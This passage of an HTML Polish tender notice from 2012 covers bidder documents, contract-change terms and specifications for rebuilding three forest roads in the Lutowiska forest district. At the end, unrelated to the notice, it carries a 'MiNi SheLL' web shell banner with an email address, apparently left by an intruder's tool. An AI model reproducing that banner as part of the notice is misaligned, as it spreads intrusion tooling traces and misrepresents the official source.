<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>2.	Do oferty należy dołączyć:
  a) Pełnomocnictwo osób podpisujących ofertę do podejmowania   
      zobowiązań w imieniu firmy składającej ofertę, jeżeli nie wynika to z  
     dokumentów wymienionych,
  b) Kosztorys ofertowy,
  c) Zaleca się również dołączyć do oferty  dowód wpłaty wadium.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Pkt. 16.1. SIWZ.  Istotne dla stron postanowienia zawiera projekt umowy. 

Pkt. 16.2. SIWZ. Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w formie pisemnej pod rygorem nieważności, w następujących okolicznościach: 

1.	potrzeby wprowadzenia zmian w Specyfikacji technicznej wykonania 
i odbioru robót budowlanych, będących podstawą realizacji przedmiotu Umowy, wywołanej zmianami w przepisach prawa, normach i standardach, zmianami w wiedzy technicznej lub zmianą funkcji użytkowej, a także zmianami uwarunkowań środowiskowych, technicznych, technologicznych lub innymi okolicznościami;

2.	potrzeby wprowadzenia zmian w miejscu i sposobie wykonania robót budowlanych, wynikających ze zmian technologicznych, osobowych, 
w organizacji spełnienia świadczenia, spowodowanych zmianami 
w przepisach prawa, norm i standardów lub zmianami w wiedzy technicznej, zmianami uwarunkowań środowiskowych lub innymi okolicznościami;

3.	zmiany lokalizacji  inwestycji gdy konieczność ta wyniknie z badań  geologicznych lub  hydrologicznych lub z uwagi na możliwość  podniesienie jej  opłacalności lub  zaleceń organów opiniujących, zezwalających, kontrolujących lub innymi okolicznościami;

4.	rezygnacji z wykonania części (całości)  zamówienia (umowy) w 
przypadku, gdy:
-  planowana inwestycja okaże się nieopłacalną lub gdy konieczność ta   
   wyniknie z  badań  geologicznych lub  hydrologicznych, 
- z uwagi na  możliwość podniesienie jej  opłacalności, 
-  na podstawie zaleceń organów  opiniujących,  zezwalających 
   kontrolujących lub innych,
- ze względu na brak wymaganych pozwoleń formalno-prawnych  
   niezbędnych do realizacji prac,
- okolicznościami leżącymi po stronie Zamawiającego.

        e)  w razie zaistnienie istotnej zmiany okoliczności powodującej, że wykonanie 
             umowy nie leży w interesie publicznym, czego nie można było przewidzieć  
             w chwili zawarcia umowy, Zamawiający może odstąpić od umowy w  
            terminie 30  dni od powzięcia wiadomości o tych okolicznościach. 
        f)   w przypadku, o którym mowa w pkt. d Wykonawca może żądać wyłącznie 
             wynagrodzenia z tytułu wykonania części umowy.
5.	   konieczności zmiany terminu realizacji spowodowanej:
-  wystąpieniem warunków atmosferycznych mających wpływ na brak  
   możliwości lub utrudnienie wykonywania umowy, np. długotrwałe 
   intensywne opady, itp.;
-  zmianami wynikającymi ze zmian przepisów prawa, norm, standardów,    
   wiedzy technicznej, warunkami geologicznymi, terenowymi,   
   archeologicznymi, wodnymi, ochrony środowiska, itp., 
- okolicznościami, których nie można było przewidzieć w chwili zawarcia 
   Umowy;
- okolicznościami leżącymi po stronie Zamawiającego;
- okolicznościami będącymi następstwem działania organów administracji i 
   innych podmiotów trzecich, a także działania siły wyższej;
- przyczyn zewnętrznych niezależnych od Zamawiającego oraz Wykonawcy  
  skutkujących niemożliwością prowadzenia działań w celu wykonania 
  umowy. 
6.	zmiany wynagrodzenia w przypadku zmian stawki podatku VAT, wynikających z obowiązujących w tym zakresie przepisów.
7.	zmiany wynagrodzenia umownego w przypadku ograniczenia zakresu przedmiotowego umowy.

                    Ponadto Zamawiający dopuszcza możliwość zmian redakcyjnych umowy, zmian będących następstwem zmian danych zarówno jego jak i Wykonawcy, w tym ujawnionych w rejestrach publicznych (np. zmiana oznaczenia adresu, nazwy wykonawcy, osoby uprawnionej do kontaktów) oraz innych zmian nie stanowiących zmian treści umowy w stosunku do treści oferty. W takiej sytuacji, wprowadzenie do umowy stosownych zmian nie stanowiących zmian treści umowy w stosunku do treści oferty nie będzie wymagało zachowania formy pisemnej, a jedynie notatki/protokołu zatwierdzonego przez przedstawicieli obu stron.
                    Wszelkie zmiany wprowadzane do umowy dokonywane będą z poszanowaniem obowiązków wynikających z przepisów prawa, w tym w szczególności nie mogą powodować wykroczenia poza określenie przedmiotu zamówienia zawarte w SIWZ, zgodnie z art. 140 ust. 3 ustawy Pzp (t.j. Dz. U. z 2010 r. Nr 113, poz. 759 ze zm.) oraz nie mogą powodować obejścia przepisu art. 144 ustawy Pzp.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.lasy.gov.pl/pl/bip/dg/rdlp_krosno/nadl_lutowiska/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Nadleśnictwo Lutowiska,    
38 - 713 Lutowiska 4.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.05.2012 godzina 14:00, miejsce: Nadleśnictwo Lutowiska,    
38 - 713 Lutowiska 4
w Sekretariacie.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Pkt. 2. SIWZ. Tryb udzielenia zamówienia
     Do udzielenia przedmiotowego zamówienia stosuje się przepisy ustawy z dnia 29 stycznia 2004 r.- Prawo zamówień publicznych z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych (tekst ujednolicony Dz. U. z 2010r.  nr 113, poz. 759 z późn. zmianami), zwanej dalej ustawą lub ustawą Pzp oraz w sprawach nieuregulowanych ustawą, przepisy ustawy - Kodeks cywilny.
Postępowanie jest prowadzone w trybie przetargu nieograniczonego na podstawie art. 39 - 46 ustawy. 
      Zamówienie na roboty budowlane jest o wartości mniejszej niż kwoty określone w przepisach wydanych na podstawie art. 11 ust. 8  ustawy Pzp.

Pkt. 3.7. SIWZ. Informacje o ofercie wariantowej, umowie ramowej i aukcji elektronicznej:
     - Zamawiający nie dopuszcza składania ofert wariantowych,
     - Zamawiający nie przewiduje zawarcia umowy ramowej,
     - Zamawiający nie przewiduje wyboru najkorzystniejszej oferty z zastosowaniem    
        aukcji elektronicznej ani utworzenia dynamicznego systemu zakupów.

Pkt. 3.8. SIWZ. Zamawiający dopuszcza składania ofert częściowych.

Pkt. 18. SIWZ. Inne postanowienia SIWZ

Pkt.18.1.SIWZ. Zamawiający przewiduje możliwość udzielania zamówień uzupełniających, o 
         których mowa w art. 67 ust. 1 pkt. 6 ustawy, polegających na powtórzeniu     
         prac będących przedmiotem zamówienia lub jego części o wartości do 50% 
         wartości zamówienia podstawowego w okresie 3 lat od udzielenia zamówienia 
         podstawowego (od terminu podpisania umowy). 
Pkt.18.2.SIWZ. Rozliczenia między Zamawiającym, a Wykonawcą będą prowadzone w 
         walucie polskiej.
Pkt.18.3. SIWZ. Zamawiający żąda wskazania przez Wykonawcę o  ofercie części zamówienia, 
         której wykonanie powierzy podwykonawcom.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część I-    przebudowa drogi leśnej Caryńskie na  długość 1559 mb,   
                 przebiegającej przez teren leśnictw Dwernik i Nasiczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Stan istniejący drogi :
W chwili obecnej droga posiada nawierzchnię gruntową. Przejazd nią jest utrudniony z powodu głębokich kolein, zastoisk wody gruntowej i opadowej. Brak odwodnienia powoduje napływ wody ze stoku na koryto i jego degradację.
Dane techniczne projektowanego odcinka drogi :
1.	długość 1559 mb
2.	szerokość jezdni 3,50m+poszerzenia, pobocza 2x0,75m
3.	odwodnienie za pomocą otwartych rowów drogowych oraz ścieku drogowego
4.	grupa nośności podłoża G3 (glina)
5.	Klasa drogi D

Stan projektowany przebudowy drogi zakłada:
1.	usunięcie zakrzaczeń, 
2.	wykonanie odhumusowania korony drogi,
3.	przebudowę i budowę nowych przepustów drogowych i studni wpadowych
4.	wykonanie odwodnienia drogi w postaci rowów odwadniających oraz ułożenia ścieku drogowego,
5.	wykonanie robót ziemnych (nasypów, wykopów, koryta),
6.	wykonanie nawierzchni utwardzonej na drodze (nawierzchnia tłuczniowa)
7.	przebudowę placów składowych
8.	zamontowanie oznakowań i pachołków drogowych
Konstrukcja nawierzchni drogowej:
1.10cm warstwa nawierzchni z tłucznia kamiennego zamknięta przy użyciu klińca i miału kamiennego drogowego,
2.18cm podbudowa z  tłucznia kamiennego, sortowanego
3. 20cm tłuczeń kamienny niesortowany
RAZEM 48 cm 

Odwodnienie drogi:
1.Odwodnienia drogi w postaci rowów odwadniających oraz ułożenia ścieku  drogowego,

2.Na projektowanym odcinku trasy przewiduje się wykonanie następujących przepustów:
1.	km 0+425.18	l=8.0m	  śr. 150cm     
2.	km 0+779.25	l=18.0m	  śr. 150cm     
3.	km 0+870.00	l=9.0m	  śr. 150cm     
4.	km 1+125.70	l=11.0m	  śr. 150cm     

W miejscach występowania wysokiego poziomu wody gruntowej w pasie drogowym należy zamontować sączki poprzeczne z kruszyw łamanych na głębokość nie mniejszą niż 0,6m od poziomu jezdni z odprowadzeniem wody na stok lub do rowu.
W jezdni drogowej zamontować wodospusty korytkowe drewniane w ilości 1szt. na każde 100 m odcinka drogi o spadku podłużnym do 5% i 2szt. na 100m drogi o spadku ponad 5%.

Przekrój poprzeczny drogi:
- zaprojektowano przekrój poprzeczny o nachyleniu 3% w kierunku spadku terenu

Bilans robót ziemnych na drodze:
1.	wykopy 8259,55 m3
2.	nasypy  8240,03 m3.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.23-7, 45.23.31.42-6, 45.23.32.80-5, 45.23.32.90-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część II-   przebudowa drogi leśnej Dwernik-Nasiczne na  długość 2095 mb, 
                 przebiegającej przez teren leśnictw Dwernik i Nasiczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Stan istniejący i projektowany
W obecnym stanie droga leśna ma nawierzchnię gruntową, ponadnormatywne spadki podłużne, nie posiada rowów odwadniających.
Planuje się przebudowę polegającą na wbudowaniu warstw konstrukcyjnych z kruszywa kamiennego, łamanego- droga będzie miała nawierzchnię tłuczniową. Ponadto przebieg drogi zostanie skorygowany, celem złagodzenia spadków podłużnych i zostaną wykonane rowy podłużne-odwadniające oraz przepusty.
Dane techniczne:
1.	klasa drogi D,
2.	kategoria ruchu KR1,
3.	prędkość projektowa 30km/h,
4.	szerokość jezdni 3.50m
5.	szerokość obustronnych poboczy 2x0.75m,
6.	długość: 2.095km.
Przekrój poprzeczny i podłużny
Spadek poprzeczny drogi powinien wynosić 3% i być dostosowany do naturalnego nachylenia terenu. Projektowane spadki podłużne kształtują się między 0.3%-14%.
Konstrukcje nawierzchni
Konstrukcję nawierzchni na projektowanej jezdni, poboczach i zjazdach na szlaki zrywkowe oraz składy drewna przyjęto zgodnie z Rozporządzeniem Ministra Transportu i Gospodarki Morskiej z dnia 2 marca 1999r w sprawie warunków technicznych, jakim powinny odpowiadać drogi publiczne i ich usytuowanie, na którą składają się:
1.	nawierzchnia z tłucznia klinowana  gr. 10cm,
2.	podbudowa z tłucznia gr. 18cm,
3.	tłuczeń niesortowany gr. 20cm.
9.	Place składowe
- nawierzchnia gruntowa z utwardzonymi tłuczniem wjazdami.
W KM 1+154.39-1+324.08 planuje się wykonać dodatkową drogę sz. 5.00m przebiegającą przez plac składowy o konstrukcji jezdni analogicznej jak drogi głównej.
Przy wjazdach na składy drewna i szlaki zrywkowe w jezdni drogowej projektuje się zamontowanie nawierzchni z płyt drogowych pełnych o długości odcinków nie przekraczających 6m.
Elementy odwodnienia
Wzdłuż projektowanej drogi należy wykonać rowy przydrożne, dna rowów powinny być umocnione prefabrykatami betonowymi (wg KPED 01.04) ułożonymi na warstwie pospółki gr. 15cm z podsypką cem.-piask. 1:4 gr. 5cm.
Przepusty pod drogą i zjazdami należy wykonać z rur karbowanych HDPE o60cm  ułożonymi na ławie fundamentowej żwirowo-piaskowej gr. 30cm, z zasypką co najmniej 30cm nad rurę - również z pospółki.
W miejscach występowania wysokiego poziomu wody gruntowej w pasie drogowym należy zamontować sączki poprzeczne z kruszyw łamanych na głębokość nie mniejszą niż 0,6m od poziomu jezdni z odprowadzeniem wody na stok lub do rowu.
W jezdni drogowej zamontować wodospusty korytkowe drewniane w ilości 1szt. na każde 100 m odcinka drogi o spadku podłużnym do 5% i 2szt. na 100m drogi o spadku ponad 5%.
Elementy bezpieczeństwa
We wskazanych lokalizacjach winny być zamontowany bariery energochłonne stalowe.
Umocnienia skarp
Skarpy wykopów i nasypów wyższe niż 2m planuje się umocnić poprzez obsianie uniwersalną mieszanką traw..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.23-7, 45.23.31.42-6, 45.23.32.80-5, 45.23.32.90-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Część III - przebudowa drogi leśnej Czarna 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Droga zlokalizowana  jest w Leśnictwie Czarna, gm.Czarna, powiat bieszczadzki. Rozpoczyna się w oddz. 30 Nadleśnictwa Lutowiska, na granicy pasa drogowego, drogi publicznej o nawierzchni asfaltowej. Początek drogi zlokalizowano na gruntach Lasów Państwowych, w km 0+008, na końcu utwardzonego (tłuczniowego) zjazdu z drogi publicznej. Kończy się w km 1+000, miejscem do nawracania.

Stan istniejący drogi :
Na całej swej długości droga przebiega przez tereny Lasów Państwowych.
Nawierzchnia gruntowa jest w bardzo złym stanie technicznym, na znacznej długości występują wysadziny, głębokie wyboje i koleiny.

Projektowane parametry techniczne drogi:

Długość drogi - 1 000 m;
Szerokość jezdni 3,5 m;
Szerokość pobocza - 0,75m x 2;
Spadki poprzeczne jezdni - 3%;
Spadki poprzeczne poboczy - 5 %;
Mijanki - 5 szt.;
Zjazdy -  szt. 2 - na szlaki zrywkowe;
Składy - 3 szt. - z tarczami zwrotnymi do nawracania pojazdów.
Klasa drogi wg kategorii - D.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.23-7, 45.23.31.42-6, 45.23.32.80-5, 45.23.32.90-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.07.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com